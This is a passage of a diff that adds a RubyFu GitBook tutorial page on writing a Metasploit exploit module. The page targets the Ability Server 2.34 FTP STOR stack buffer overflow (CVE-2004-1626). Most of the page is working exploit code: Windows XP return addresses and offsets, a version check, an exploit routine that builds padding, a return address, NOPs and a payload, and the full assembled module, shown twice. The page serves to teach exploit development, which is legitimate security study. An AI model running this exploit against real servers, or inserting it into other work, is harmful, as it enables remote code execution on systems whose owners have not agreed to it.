+ <i class="fa fa-check"></i>
864
+
865
+ <b>5.</b>
866
+
867
+ Module 0x5 | Exploitation Kung Fu
868
+ </a>
869
+
870
+
871
+ <ul class="articles">
872
+
873
+
874
+ <li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
875
+
876
+
877
+ <a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
878
+
879
+ <i class="fa fa-check"></i>
880
+
881
+ <b>5.1.</b>
882
+
883
+ Fuzzer
884
+ </a>
885
+
886
+
887
+ </li>
888
+
889
+ <li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
890
+
891
+
892
+ <a href="../module_0x5__exploitation_kung_fu/metasploit.html">
893
+
894
+ <i class="fa fa-check"></i>
895
+
896
+ <b>5.2.</b>
897
+
898
+ Metasploit
899
+ </a>
900
+
901
+
902
+ <ul class="articles">
903
+
904
+
905
+ <li class="chapter " data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
906
+
907
+
908
+ <a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
909
+
910
+ <i class="fa fa-check"></i>
911
+
912
+ <b>5.2.1.</b>
913
+
914
+ Auxiliary module
915
+ </a>
916
+
917
+
918
+ </li>
919
+
920
+ <li class="chapter active" data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
921
+
922
+
923
+ <a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
924
+
925
+ <i class="fa fa-check"></i>
926
+
927
+ <b>5.2.2.</b>
928
+
929
+ Exploit module
930
+ </a>
931
+
932
+
933
+ </li>
934
+
935
+ <li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
936
+
937
+
938
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
939
+
940
+ <i class="fa fa-check"></i>
941
+
942
+ <b>5.2.3.</b>
943
+
944
+ Meterpreter
945
+ </a>
946
+
947
+
948
+ <ul class="articles">
949
+
950
+
951
+ <li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
952
+
953
+
954
+ <a href="../module_0x5__exploitation_kung_fu/extensions.html">
955
+
956
+ <i class="fa fa-check"></i>
957
+
958
+ <b>5.2.3.1.</b>
959
+
960
+ API and Extensions
961
+ </a>
962
+
963
+
964
+ </li>
965
+
966
+ <li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
967
+
968
+
969
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
970
+
971
+ <i class="fa fa-check"></i>
972
+
973
+ <b>5.2.3.2.</b>
974
+
975
+ Meterpreter Scripting
976
+ </a>
977
+
978
+
979
+ </li>
980
+
981
+ <li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
982
+
983
+
984
+ <a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
985
+
986
+ <i class="fa fa-check"></i>
987
+
988
+ <b>5.2.3.3.</b>
989
+
990
+ Railgun API Extension
991
+ </a>
992
+
993
+
994
+ </li>
995
+
996
+
997
+ </ul>
998
+
999
+ </li>
1000
+
1001
+
1002
+ </ul>
1003
+
1004
+ </li>
1005
+
1006
+ <li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
1007
+
1008
+
1009
+ <a href="../module_0x5__exploitation_kung_fu/metasm.html">
1010
+
1011
+ <i class="fa fa-check"></i>
1012
+
1013
+ <b>5.3.</b>
1014
+
1015
+ metasm
1016
+ </a>
1017
+
1018
+
1019
+ </li>
1020
+
1021
+
1022
+ </ul>
1023
+
1024
+ </li>
1025
+
1026
+ <li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
1027
+
1028
+
1029
+ <a href="../module_0x6__forensic/index.html">
1030
+
1031
+ <i class="fa fa-check"></i>
1032
+
1033
+ <b>6.</b>
1034
+
1035
+ Module 0x6 | Forensic Kung Fu
1036
+ </a>
1037
+
1038
+
1039
+ <ul class="articles">
1040
+
1041
+
1042
+ <li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
1043
+
1044
+
1045
+ <a href="../module_0x6__forensic/windows_forensic.html">
1046
+
1047
+ <i class="fa fa-check"></i>
1048
+
1049
+ <b>6.1.</b>
1050
+
1051
+ Windows Forensic
1052
+ </a>
1053
+
1054
+
1055
+ </li>
1056
+
1057
+ <li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
1058
+
1059
+
1060
+ <a href="../module_0x6__forensic/android_forensic.html">
1061
+
1062
+ <i class="fa fa-check"></i>
1063
+
1064
+ <b>6.2.</b>
1065
+
1066
+ Android Forensic
1067
+ </a>
1068
+
1069
+
1070
+ </li>
1071
+
1072
+ <li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
1073
+
1074
+
1075
+ <a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
1076
+
1077
+ <i class="fa fa-check"></i>
1078
+
1079
+ <b>6.3.</b>
1080
+
1081
+ Network Traffic Analysis
1082
+ </a>
1083
+
1084
+
1085
+ </li>
1086
+
1087
+ <li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
1088
+
1089
+
1090
+ <a href="../module_0x6__forensic/parsing_log_files.html">
1091
+
1092
+ <i class="fa fa-check"></i>
1093
+
1094
+ <b>6.4.</b>
1095
+
1096
+ Parsing Log Files
1097
+ </a>
1098
+
1099
+
1100
+ </li>
1101
+
1102
+
1103
+ </ul>
1104
+
1105
+ </li>
1106
+
1107
+ <li class="chapter " data-level="7" data-path="references/index.html">
1108
+
1109
+
1110
+ <a href="../references/index.html">
1111
+
1112
+ <i class="fa fa-check"></i>
1113
+
1114
+ <b>7.</b>
1115
+
1116
+ References
1117
+ </a>
1118
+
1119
+
1120
+ </li>
1121
+
1122
+ <li class="chapter " data-level="8" data-path="faqs/index.html">
1123
+
1124
+
1125
+ <a href="../faqs/index.html">
1126
+
1127
+ <i class="fa fa-check"></i>
1128
+
1129
+ <b>8.</b>
1130
+
1131
+ FAQs
1132
+ </a>
1133
+
1134
+
1135
+ </li>
1136
+
1137
+ <li class="chapter " data-level="9" data-path="contributors/index.html">
1138
+
1139
+
1140
+ <a href="../contributors/index.html">
1141
+
1142
+ <i class="fa fa-check"></i>
1143
+
1144
+ <b>9.</b>
1145
+
1146
+ Contributors
1147
+ </a>
1148
+
1149
+
1150
+ <ul class="articles">
1151
+
1152
+
1153
+ <li class="chapter " data-level="9.1" data-path="contributors/todo.html">
1154
+
1155
+
1156
+ <a href="../contributors/todo.html">
1157
+
1158
+ <i class="fa fa-check"></i>
1159
+
1160
+ <b>9.1.</b>
1161
+
1162
+ TODO
1163
+ </a>
1164
+
1165
+
1166
+ </li>
1167
+
1168
+
1169
+ </ul>
1170
+
1171
+ </li>
1172
+
1173
+
1174
+
1175
+
1176
+ <li class="divider"></li>
1177
+ <li>
1178
+ <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
1179
+ Published with GitBook
1180
+ </a>
1181
+ </li>
1182
+
1183
+ </ul>
1184
+ </nav>
1185
+ </div>
1186
+
1187
+ <div class="book-body">
1188
+ <div class="body-inner">
1189
+ <div class="book-header" role="navigation">
1190
+ <!-- Actions Left -->
1191
+
1192
+
1193
+ <!-- Title -->
1194
+ <h1>
1195
+ <i class="fa fa-circle-o-notch fa-spin"></i>
1196
+ <a href="../" >RubyFu</a>
1197
+ </h1>
1198
+ </div>
1199
+
1200
+ <div class="page-wrapper" tabindex="-1" role="main">
1201
+ <div class="page-inner">
1202
+
1203
+
1204
+ <section class="normal" id="section-">
1205
+
1206
+ <h1 id="exploit-module"><a name="exploit-module" class="plugin-anchor" href="#exploit-module"><span class="fa fa-link"></span></a>Exploit module</h1>
1207
+ <h2 id="remote-exploit"><a name="remote-exploit" class="plugin-anchor" href="#remote-exploit"><span class="fa fa-link"></span></a>Remote Exploit</h2>
1208
+ <h3 id="ftp-exploit"><a name="ftp-exploit" class="plugin-anchor" href="#ftp-exploit"><span class="fa fa-link"></span></a>FTP exploit</h3>
1209
+ <p>Our example will be a very simple vulnerable FTP server called ability server.</p>
1210
+ <h4 id="what-do-we-want"><a name="what-do-we-want" class="plugin-anchor" href="#what-do-we-want"><span class="fa fa-link"></span></a>What do we want?</h4>
1211
+ <ul>
1212
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Create Exploit module</li>
1213
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Exploit FTP Server</li>
1214
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Set exploit rank</li>
1215
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Describe The module</li>
1216
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Let people know we created this module</li>
1217
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Add references about the vulnerability that we exploit</li>
1218
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Choose a default payload </li>
1219
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Set the Bad characters.</li>
1220
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Set Disclosure Date</li>
1221
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Targets and it&apos;s return address (EIP offset)</li>
1222
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Options to set the target IP, port. Also username and password if required.</li>
1223
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Check the target if vulnerable.</li>
1224
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Send the exploit</li>
1225
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Check if the module has been written correctly (msftidy.rb)</li>
1226
+ </ul>
1227
+ <h4 id="steps"><a name="steps" class="plugin-anchor" href="#steps"><span class="fa fa-link"></span></a>Steps</h4>
1228
+ <ul>
1229
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Create Exploit module</li>
1230
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Exploit FTP Server</li>
1231
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Put a rank for the module</li>
1232
+ </ul>
1233
+ <pre><code class="lang-ruby"><span class="hljs-comment">##</span>
1234
+ <span class="hljs-comment"># This module requires Metasploit: http://www.metasploit.com/download</span>
1235
+ <span class="hljs-comment"># Current source: https://github.com/rapid7/metasploit-framework</span>
1236
+ <span class="hljs-comment">##</span>
1237
+
1238
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;msf/core&apos;</span>
1239
+
1240
+ <span class="hljs-comment">### Module Type ###</span>
1241
+ <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Metasploit3</span> <span class="hljs-inheritance">&lt; <span class="hljs-parent">Msf::Exploit</span></span>::<span class="hljs-title">Remote</span></span>
1242
+ <span class="hljs-constant">Rank</span> = <span class="hljs-constant">NormalRanking</span>
1243
+
1244
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::Ftp</span>
1245
+ </code></pre>
1246
+ <ul>
1247
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Describe The module</li>
1248
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Let people know we created this module</li>
1249
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Add references about the vulnerability that we exploit</li>
1250
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Choose a default payload </li>
1251
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Set the Bad characters.</li>
1252
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Set Disclosure Date</li>
1253
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Targets and it&apos;s return address (EIP offset)</li>
1254
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Options to set the target IP, port. Also username and password if required.</li>
1255
+ </ul>
1256
+ <pre><code class="lang-ruby"> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">initialize</span><span class="hljs-params">(info = {})</span></span>
1257
+ <span class="hljs-keyword">super</span>(update_info(
1258
+ info,
1259
+ <span class="hljs-string">&apos;Name&apos;</span> =&gt; <span class="hljs-string">&apos;Ability Server 2.34 STOR Command Stack Buffer Overflow&apos;</span>,
1260
+ <span class="hljs-string">&apos;Description&apos;</span> =&gt; <span class="hljs-string">%q{
1261
+ This module exploits a stack-based buffer overflow in Ability Server 2.34.
1262
+ Ability Server fails to check input size when parsing &apos;STOR&apos; and &apos;APPE&apos; commands,
1263
+ which leads to a stack based buffer overflow. This plugin uses the &apos;STOR&apos; command.
1264
+
1265
+ The vulnerability has been confirmed on version 2.34 and has also been reported
1266
+ in version 2.25 and 2.32. Other versions may also be affected.}</span>,
1267
+ <span class="hljs-string">&apos;License&apos;</span> =&gt; <span class="hljs-constant">MSF_LICENSE</span>,
1268
+ <span class="hljs-string">&apos;Author&apos;</span> =&gt;
1269
+ [
1270
+ <span class="hljs-string">&apos;muts&apos;</span>, <span class="hljs-comment"># Initial discovery</span>
1271
+ <span class="hljs-string">&apos;Dark Eagle&apos;</span>, <span class="hljs-comment"># same as muts</span>
1272
+ <span class="hljs-string">&apos;Peter Osterberg&apos;</span>, <span class="hljs-comment"># Metasploit</span>
1273
+ <span class="hljs-string">&apos;Ruby (@Rubyfu)&apos;</span>, <span class="hljs-comment"># Just explain the module</span>
1274
+ ],
1275
+ <span class="hljs-string">&apos;References&apos;</span> =&gt;
1276
+ [
1277
+ [ <span class="hljs-string">&apos;CVE&apos;</span>, <span class="hljs-string">&apos;2004-1626&apos;</span> ],
1278
+ [ <span class="hljs-string">&apos;OSVDB&apos;</span>, <span class="hljs-string">&apos;11030&apos;</span>],
1279
+ [ <span class="hljs-string">&apos;EDB&apos;</span>, <span class="hljs-string">&apos;588&apos;</span>],
1280
+ [<span class="hljs-string">&apos;URL&apos;</span>, <span class="hljs-string">&apos;http://rubyfu.net&apos;</span>] <span class="hljs-comment"># Just explain the module</span>
1281
+ ],
1282
+ <span class="hljs-string">&apos;Platform&apos;</span> =&gt; <span class="hljs-string">%w{ win }</span>,
1283
+ <span class="hljs-string">&apos;Targets&apos;</span> =&gt;
1284
+ [
1285
+ [
1286
+ <span class="hljs-string">&apos;Windows XP SP2 ENG&apos;</span>,
1287
+ {
1288
+ <span class="hljs-comment">#JMP ESP (MFC42.dll. Addr remains unchanged until a patched SP3)</span>
1289
+ <span class="hljs-string">&apos;Ret&apos;</span> =&gt; <span class="hljs-number">0x73E32ECF</span>,
1290
+ <span class="hljs-string">&apos;Offset&apos;</span> =&gt; <span class="hljs-number">966</span>
1291
+ }
1292
+ ],
1293
+ [
1294
+ <span class="hljs-string">&apos;Windows XP SP3 ENG&apos;</span>,
1295
+ {
1296
+ <span class="hljs-comment">#JMP ESP (USER32.dll. Unchanged unpatched SP3 - fully patched)</span>
1297
+ <span class="hljs-string">&apos;Ret&apos;</span> =&gt; <span class="hljs-number">0x7E429353</span>,
1298
+ <span class="hljs-string">&apos;Offset&apos;</span> =&gt; <span class="hljs-number">966</span>
1299
+ }
1300
+ ],
1301
+ ],
1302
+ <span class="hljs-string">&apos;DefaultTarget&apos;</span> =&gt; <span class="hljs-number">0</span>,
1303
+ <span class="hljs-string">&apos;DisclosureDate&apos;</span> =&gt; <span class="hljs-string">&apos;Oct 22 2004&apos;</span>
1304
+ ))
1305
+
1306
+ register_options(
1307
+ [
1308
+ <span class="hljs-constant">Opt::RPORT</span>(<span class="hljs-number">21</span>),
1309
+ <span class="hljs-constant">OptString</span>.new(<span class="hljs-string">&apos;FTPUSER&apos;</span>, [ <span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Valid FTP username&apos;</span>, <span class="hljs-string">&apos;ftp&apos;</span> ]),
1310
+ <span class="hljs-constant">OptString</span>.new(<span class="hljs-string">&apos;FTPPASS&apos;</span>, [ <span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Valid FTP password for username&apos;</span>, <span class="hljs-string">&apos;ftp&apos;</span> ])
1311
+ ], <span class="hljs-keyword">self</span>.<span class="hljs-keyword">class</span>)
1312
+ <span class="hljs-keyword">end</span>
1313
+ </code></pre>
1314
+ <ul>
1315
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check the target if vulnerable.</li>
1316
+ </ul>
1317
+ <pre><code class="lang-ruby"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">check</span></span>
1318
+ connect
1319
+ disconnect
1320
+ <span class="hljs-keyword">if</span> banner =~ <span class="hljs-regexp">/Ability Server 2\.34/</span>
1321
+ <span class="hljs-keyword">return</span> <span class="hljs-constant">Exploit::CheckCode::Appears</span>
1322
+ <span class="hljs-keyword">else</span>
1323
+ <span class="hljs-keyword">if</span> banner =~ <span class="hljs-regexp">/Ability Server/</span>
1324
+ <span class="hljs-keyword">return</span> <span class="hljs-constant">Exploit::CheckCode::Detected</span>
1325
+ <span class="hljs-keyword">end</span>
1326
+ <span class="hljs-keyword">end</span>
1327
+ <span class="hljs-keyword">return</span> <span class="hljs-constant">Exploit::CheckCode::Safe</span>
1328
+ <span class="hljs-keyword">end</span>
1329
+ </code></pre>
1330
+ <ul>
1331
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Send the exploit</li>
1332
+ </ul>
1333
+ <pre><code class="lang-ruby"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">exploit</span></span>
1334
+ c = connect_login
1335
+ <span class="hljs-keyword">return</span> <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> c
1336
+
1337
+ myhost = datastore[<span class="hljs-string">&apos;LHOST&apos;</span>] == <span class="hljs-string">&apos;0.0.0.0&apos;</span> ? <span class="hljs-constant">Rex::Socket</span>.source_address <span class="hljs-symbol">:</span> datastore[<span class="hljs-string">&apos;LHOST&apos;</span>]
1338
+
1339
+ <span class="hljs-comment"># Take client IP address + FTP user lengths into account for EIP offset</span>
1340
+ padd_size = target[<span class="hljs-string">&apos;Offset&apos;</span>] + (<span class="hljs-number">13</span> - myhost.length) + (<span class="hljs-number">3</span> - datastore[<span class="hljs-string">&apos;FTPUSER&apos;</span>].length)
1341
+ junk = rand_text_alpha(padd_size)
1342
+
1343
+ sploit = junk
1344
+ sploit &lt;&lt; [target.ret].pack(<span class="hljs-string">&apos;V&apos;</span>)
1345
+ sploit &lt;&lt; make_nops(<span class="hljs-number">32</span>)
1346
+ sploit &lt;&lt; payload.encoded
1347
+ sploit &lt;&lt; rand_text_alpha(sploit.length)
1348
+
1349
+ send_cmd([<span class="hljs-string">&apos;STOR&apos;</span>, sploit], <span class="hljs-keyword">false</span>)
1350
+ handler
1351
+ disconnect
1352
+ <span class="hljs-keyword">end</span>
1353
+ </code></pre>
1354
+ <h3 id="wrapping-up"><a name="wrapping-up" class="plugin-anchor" href="#wrapping-up"><span class="fa fa-link"></span></a>Wrapping up</h3>
1355
+ <pre><code class="lang-ruby"><span class="hljs-comment">##</span>
1356
+ <span class="hljs-comment"># This module requires Metasploit: http://metasploit.com/download</span>
1357
+ <span class="hljs-comment"># Current source: https://github.com/rapid7/metasploit-framework</span>
1358
+ <span class="hljs-comment">##</span>
1359
+
1360
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;msf/core&apos;</span>
1361
+
1362
+ <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Metasploit3</span> <span class="hljs-inheritance">&lt; <span class="hljs-parent">Msf::Exploit</span></span>::<span class="hljs-title">Remote</span></span>
1363
+ <span class="hljs-constant">Rank</span> = <span class="hljs-constant">NormalRanking</span>
1364
+
1365
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::Ftp</span>
1366
+
1367
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">initialize</span><span class="hljs-params">(info = {})</span></span>
1368
+ <span class="hljs-keyword">super</span>(update_info(
1369
+ info,
1370
+ <span class="hljs-string">&apos;Name&apos;</span> =&gt; <span class="hljs-string">&apos;Ability Server 2.34 STOR Command Stack Buffer Overflow&apos;</span>,
1371
+ <span class="hljs-string">&apos;Description&apos;</span> =&gt; <span class="hljs-string">%q{
1372
+ This module exploits a stack-based buffer overflow in Ability Server 2.34.
1373
+ Ability Server fails to check input size when parsing &apos;STOR&apos; and &apos;APPE&apos; commands,
1374
+ which leads to a stack based buffer overflow. This plugin uses the &apos;STOR&apos; command.
1375
+
1376
+ The vulnerability has been confirmed on version 2.34 and has also been reported
1377
+ in version 2.25 and 2.32. Other versions may also be affected.}</span>,
1378
+ <span class="hljs-string">&apos;License&apos;</span> =&gt; <span class="hljs-constant">MSF_LICENSE</span>,
1379
+ <span class="hljs-string">&apos;Author&apos;</span> =&gt;
1380
+ [
1381
+ <span class="hljs-string">&apos;muts&apos;</span>, <span class="hljs-comment"># Initial discovery</span>
1382
+ <span class="hljs-string">&apos;Dark Eagle&apos;</span>, <span class="hljs-comment"># same as muts</span>
1383
+ <span class="hljs-string">&apos;Peter Osterberg&apos;</span>, <span class="hljs-comment"># Metasploit</span>
1384
+ <span class="hljs-string">&apos;Ruby (@Rubyfu)&apos;</span>, <span class="hljs-comment"># Just explain the module</span>
1385
+ ],
1386
+ <span class="hljs-string">&apos;References&apos;</span> =&gt;
1387
+ [
1388
+ [ <span class="hljs-string">&apos;CVE&apos;</span>, <span class="hljs-string">&apos;2004-1626&apos;</span> ],
1389
+ [ <span class="hljs-string">&apos;OSVDB&apos;</span>, <span class="hljs-string">&apos;11030&apos;</span>],
1390
+ [ <span class="hljs-string">&apos;EDB&apos;</span>, <span class="hljs-string">&apos;588&apos;</span>],
1391
+ [<span class="hljs-string">&apos;URL&apos;</span>, <span class="hljs-string">&apos;http://rubyfu.net&apos;</span>] <span class="hljs-comment"># Just explain the module</span>
1392
+ ],
1393
+ <span class="hljs-string">&apos;Platform&apos;</span> =&gt; <span class="hljs-string">%w{ win }</span>,
1394
+ <span class="hljs-string">&apos;Targets&apos;</span> =&gt;
1395
+ [
1396
+ [
1397
+ <span class="hljs-string">&apos;Windows XP SP2 ENG&apos;</span>,
1398
+ {
1399
+ <span class="hljs-comment">#JMP ESP (MFC42.dll. Addr remains unchanged until a patched SP3)</span>
1400
+ <span class="hljs-string">&apos;Ret&apos;</span> =&gt; <span class="hljs-number">0x73E32ECF</span>,
1401
+ <span class="hljs-string">&apos;Offset&apos;</span> =&gt; <span class="hljs-number">966</span>
1402
+ }
1403
+ ],
1404
+ [
1405
+ <span class="hljs-string">&apos;Windows XP SP3 ENG&apos;</span>,
1406
+ {
1407
+ <span class="hljs-comment">#JMP ESP (USER32.dll. Unchanged unpatched SP3 - fully patched)</span>
1408
+ <span class="hljs-string">&apos;Ret&apos;</span> =&gt; <span class="hljs-number">0x7E429353</span>,
1409
+ <span class="hljs-string">&apos;Offset&apos;</span> =&gt; <span class="hljs-number">966</span>
1410
+ }
1411
+ ],
1412
+ ],
1413
+ <span class="hljs-string">&apos;DefaultTarget&apos;</span> =&gt; <span class="hljs-number">0</span>,
1414
+ <span class="hljs-string">&apos;DisclosureDate&apos;</span> =&gt; <span class="hljs-string">&apos;Oct 22 2004&apos;</span>
1415
+ ))
1416
+
1417
+ register_options(
1418
+ [
1419
+ <span class="hljs-constant">Opt::RPORT</span>(<span class="hljs-number">21</span>),
1420
+ <span class="hljs-constant">OptString</span>.new(<span class="hljs-string">&apos;FTPUSER&apos;</span>, [ <span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Valid FTP username&apos;</span>, <span class="hljs-string">&apos;ftp&apos;</span> ]),
1421
+ <span class="hljs-constant">OptString</span>.new(<span class="hljs-string">&apos;FTPPASS&apos;</span>, [ <span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Valid FTP password for username&apos;</span>, <span class="hljs-string">&apos;ftp&apos;</span> ])
1422
+ ], <span class="hljs-keyword">self</span>.<span class="hljs-keyword">class</span>)
1423
+ <span class="hljs-keyword">end</span>
1424
+
1425
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">check</span></span>
1426
+ connect
1427
+ disconnect
1428
+ <span class="hljs-keyword">if</span> banner =~ <span class="hljs-regexp">/Ability Server 2\.34/</span>
1429
+ <span class="hljs-keyword">return</span> <span class="hljs-constant">Exploit::CheckCode::Appears</span>
1430
+ <span class="hljs-keyword">else</span>
1431
+ <span class="hljs-keyword">if</span> banner =~ <span class="hljs-regexp">/Ability Server/</span>
1432
+ <span class="hljs-keyword">return</span> <span class="hljs-constant">Exploit::CheckCode::Detected</span>
1433
+ <span class="hljs-keyword">end</span>
1434
+ <span class="hljs-keyword">end</span>
1435
+ <span class="hljs-keyword">return</span> <span class="hljs-constant">Exploit::CheckCode::Safe</span>
1436
+ <span class="hljs-keyword">end</span>
1437
+
1438
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">exploit</span></span>
1439
+ c = connect_login
1440
+ <span class="hljs-keyword">return</span> <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> c
1441
+
1442
+ myhost = datastore[<span class="hljs-string">&apos;LHOST&apos;</span>] == <span class="hljs-string">&apos;0.0.0.0&apos;</span> ? <span class="hljs-constant">Rex::Socket</span>.source_address <span class="hljs-symbol">:</span> datastore[<span class="hljs-string">&apos;LHOST&apos;</span>]
1443
+
1444
+ <span class="hljs-comment"># Take client IP address + FTP user lengths into account for EIP offset</span>
1445
+ padd_size = target[<span class="hljs-string">&apos;Offset&apos;</span>] + (<span class="hljs-number">13</span> - myhost.length) + (<span class="hljs-number">3</span> - datastore[<span class="hljs-string">&apos;FTPUSER&apos;</span>].length)
1446
+ junk = rand_text_alpha(padd_size)
1447
+
1448
+ sploit = junk
1449
+ sploit &lt;&lt; [target.ret].pack(<span class="hljs-string">&apos;V&apos;</span>)
1450
+ sploit &lt;&lt; make_nops(<span class="hljs-number">32</span>)
1451
+ sploit &lt;&lt; payload.encoded
1452
+ sploit &lt;&lt; rand_text_alpha(sploit.length)
1453
+
1454
+ send_cmd([<span class="hljs-string">&apos;STOR&apos;</span>, sploit], <span class="hljs-keyword">false</span>)
1455
+ handler
1456
+ disconnect
1457
+ <span class="hljs-keyword">end</span>
1458
+ <span class="hljs-keyword">end</span>
1459
+ </code></pre>
1460
+ <ul>
1461
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check if the module has been written correctly (msftidy.rb)</li>
1462
+ </ul>
1463
+ <pre><code>metasploit-framework/tools/dev/msftidy.rb ability_server_stor.rb
1464
+ </code></pre>
1465
+
1466
+ </section>
1467
+
1468
+
1469
+ </div>
1470
+ </div>
1471
+ </div>
1472
+
1473
+
1474
+ <a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html" class="navigation navigation-prev " aria-label="Previous page: Auxiliary module"><i class="fa fa-angle-left"></i></a>
1475
+
1476
+
1477
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter.html" class="navigation navigation-next " aria-label="Next page: Meterpreter"><i class="fa fa-angle-right"></i></a>
1478
+
1479
+ </div>
1480
+ </div>
1481
+
1482
+
1483
+ <script src="../gitbook/app.js"></script>
1484
+
1485
+
1486
+ <script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
1487
+
1488
+
1489
+
1490
+ <script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
1491
+
1492
+
1493
+
1494
+ <script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
1495
+
1496
+
1497
+
1498
+ <script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
1499
+
1500
+
1501
+
1502
+ <script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
1503
+
1504
+
1505
+
1506
+ <script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
1507
+
1508
+
1509
+
1510
+ <script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
1511
+
1512
+
1513
+ <script>
1514
+ require(["gitbook"], function(gitbook) {
1515
+ var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
1516
+ gitbook.start(config);
1517
+ });
1518
+ </script>
1519
+
1520
+
1521
+ </body>
1522
+
1523
+ </html>